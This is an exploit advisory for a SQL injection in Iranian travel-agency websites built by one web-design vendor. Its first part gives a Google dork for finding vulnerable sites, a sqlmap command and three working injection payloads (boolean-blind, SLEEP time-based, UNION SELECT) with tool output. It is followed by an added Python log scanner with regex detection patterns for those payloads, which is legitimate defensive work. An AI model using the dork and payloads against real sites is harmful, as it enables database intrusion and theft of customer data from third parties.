Websites of Iranian travel agencies By Aryan chehreghani

2020.05.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
# Exploit Title: [sql Injection]
# Google Dork: [inurl:php?id= intext:طراحی وب سایت : ایران تکنولوژی]
# Software Link: http://sqlmap.org/
# Dork CVE: N/A
# Date: [2020-05-24]
# Exploit Author: [Aryan Chehreghani | Ictus_TM]
# Team Channel : T.me/Ictus_TM
# Version: All Version
# Tested on: [Linux / Windows / ....]
______________________________________________________________________________________
SQLMAP :

[-] sqlmap -u "http://victim.com/fa/user/temp.php?pavc_njol=specific&id=87" --dbs
______________________________________________________________________________________
Testing :

Generic UNION query (NULL)
MySQL >= 5.0.12 AND time-based blind (query SLEEP)

[#] Testing Method:

[+] - boolean-based blind
[+] - time-based blind
______________________________________________________________________________________
|||||||||||||||||||||||
Parameter: sec (GET) ||
|||||||||||||||||||||||

EX Payload :

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: irantech_parvaz=specific&id=87' AND 4752=4752 AND 'qNzU'='qNzU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: irantech_parvaz=specific&id=87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: irantech_parvaz=specific&id=-6437' UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6b71,0x4c70465956435372566e62444e59784e476a416c6951684d4375484c4754566365796f4747777a79,0x71766b7071)-- -
---
[05:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
____________________________________________________________________________________
[=] T.me/Clvsornapv
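
For site operators reviewing their logs, the following added example (not part of the original advisory) scans web-server access-log lines for the three payload types listed above in GET parameters. The log format, the 192.0.2.x client addresses and the shortened UNION payload are constructed assumptions; the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Signatures derived from the three payload types listed in the advisory.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan(log_lines):
    """Return (line_no, client, parameter, technique) for each suspicious value."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        # parse_qsl percent-decodes, so encoded payloads are matched in clear text.
        query = urlsplit(match.group(1)).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            for technique, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.append((line_no, client, param, technique))
    return findings

def sample_log():
    """Constructed access-log lines; payloads are shaped like the advisory's."""
    values = [
        "87",  # benign request
        "87' AND 4752=4752 AND 'qNzU'='qNzU",
        "87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH",
        "-6437' UNION ALL SELECT NULL,NULL,NULL-- -",  # shortened from the advisory
    ]
    template = ('192.0.2.{n} - - [24/May/2020:05:49:0{n} +0000] '
                '"GET /fa/user/temp.php?irantech_parvaz=specific&id={v} HTTP/1.1" 200 512')
    return [template.format(n=n, v=quote(v, safe="")) for n, v in enumerate(values, 1)]

if __name__ == "__main__":
    for finding in scan(sample_log()):
        print(finding)
```

Pattern matching like this only surfaces attempts in logs; the fix for the flaw itself is to bind `id` as a parameter in a prepared statement instead of concatenating it into the query.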

